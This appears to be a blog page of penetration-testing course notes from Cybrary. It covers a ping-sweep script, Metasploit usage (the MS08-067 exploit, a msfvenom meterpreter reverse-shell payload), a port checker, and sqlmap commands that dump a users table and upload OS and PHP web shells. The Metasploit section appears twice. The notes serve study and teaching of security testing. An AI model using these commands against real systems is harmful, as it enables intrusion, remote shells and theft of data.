Source: "Advanced Penetration Testing" Cybrary I. # Pings the C class network and prints only live hosts #!/bin/bash if [ “$1” == “”] then echo “Usage: ./pingscript.sh [network]” echo “example: ./pingscript.sh 192.168.20” else for x in `seq 1 254`; do ping -c 1 $1.$x | grep “64 bytes” | cut -d” “ -f4 | sed ‘s/.$//’ done fi II. $: chmod +x [name of the bash script]
0 Comments
Source: "Advanced Penetration Testing" Cybrary
*Exploitation Framework *Written in Ruby *Modular Exploits, payloads, auxiliaries, and more Terminology: *Exploit: vector for penetrating the system *Payload: shellcode, what you want the exploit to do after exploitation *Auxiliary: other exploit modules such as scanning, information gathering Session: connection from a successful exploit Interfaces Msfconsole Msfcli Armitage Utilities Msfpayload Msfencode Msfupdate Msfvenom Traditional vs. Metasploit Traditional Exploit Find public exploit Replace offsets, return address, etc. for your target Replace shellcode Metasploit Load Metasploit module Select target Select payload Metasploit Payloads Bind shell – opens a port on the victim machine Reverse shell – pushes a shell back to the attacker Inline – full payload in the exploit Staged – shellcode calls back to attacker to get the rest Msfcli [command line option] O = Show options P = Show payloads E = Run exploit E.g., $: msfcli windows/smb/ms08_067_netapi RHOST=10.0.0.101 PAYLOAD=windows/shell/ reverse_tcp LHOST=10.0.0.100 E Msfvenom Make shellcode and stand alone payloads -l list modules -f output format -p payload to use E.g., $: msfvenom -p windows/messagebox text="Hello World" -f exe > test.exe Multi/Handler *Generic payload handler *Catch payloads started outside of the framework msf> use multi/handler $: msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.190 LPORT=1337 -f exe > meterpreter.exe Source: "Advanced Penetration Testing" Cybrary
*Exploitation Framework *Written in Ruby *Modular *Exploits, payloads, auxiliaries, and more Terminology Exploit: vector for penetrating the system Payload: shellcode, what you want the exploit to do after exploitation Auxiliary: other exploit modules such as scanning, information gathering Session: connection from a successful exploit Interfaces Msfconsole Msfcli Armitage Utilities Msfpayload Msfencode Msfupdate Msfvenom Exploitation Streamlining Traditional Exploit Find public exploit Replace offsets, return address, etc. for your target Replace shellcode Metasploit Load Metasploit module Select target Select payload Metasploit Payloads Bind shell – opens a port on the victim machine Reverse shell – pushes a shell back to the attacker Inline – full payload in the exploit Staged – shellcode calls back to attacker to get the rest Msfcli [command line] O = Show options P = Show payloads E = Run exploit E.g., $: msfcli windows/smb/ms08_067_netapi RHOST=10.0.0.101 PAYLOAD=windows/shell/ reverse_tcp LHOST=10.0.0.100 E Msfvenom Example msfvenom -p windows/messagebox text="Hello World" -f exe > test.exe Multi/Handler Generic payload handler Catch payloads started outside of the framework For example payloads from Msfvenom msf> use multi/handler $: msvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.190 LPORT=1337 -f exe > meterpreter.exe Source: "Advanced Penetration Testing" Cybrary
#!/usr/bin/python import socket ip = raw_input(“Enter the ip: “) port = input(“Enter the port: “) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) if s.connect_ex((ip,port)): print “Port”, port, “is closed” else: print “Port”, port, “is open 1. Burpsuite -> Intruder
http://www.site.com/section.php?id=51 2. sqlmap python sqlmap.py -u "http://www.site.com/section.php?id=51" # Discover databases python sqlmap.py -u "http://www.sitemap.com/section.php?id=51" --dbs # Find tables in a particular database python sqlmap.py -u "http://www.site.com/section.php?id=51" --tables -D database_name # Get columns of the table python sqlmap.py -u "http://www.site.com/section.php?id=51" --columns -D database_name -T users # Get data from the columns python sqlmap.py -u "http://www.site.com/section.php?id=51" --dump -D database_name -T users # Upload os-shell python sqlmap.py -u "http://www.site.com/section.php?id=51" --os-shell # Upload a PHP shell -> b374kshell.php |
AuthorVitali Kremez Archives
July 2016
Categories |